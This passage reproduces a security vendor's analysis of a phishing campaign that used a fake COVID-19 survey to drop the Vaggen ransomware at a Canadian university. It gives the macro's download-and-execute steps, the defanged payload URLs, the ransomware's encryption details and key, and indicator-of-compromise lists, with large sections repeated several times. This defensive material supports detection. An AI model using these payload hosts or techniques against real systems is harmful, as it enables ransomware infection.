survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1524 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1525 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1526 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1527 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1528 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1529 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1530 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1531 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1532 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1533 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1534 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1535 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1536 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1537 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1538 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1539 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1540 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1541 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1542 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1543 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1544 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1545 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1546 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1547 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1548 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1549 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1550 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1551 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1552 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1553 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1554 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1555 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1556 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1557 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1558 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1559 of 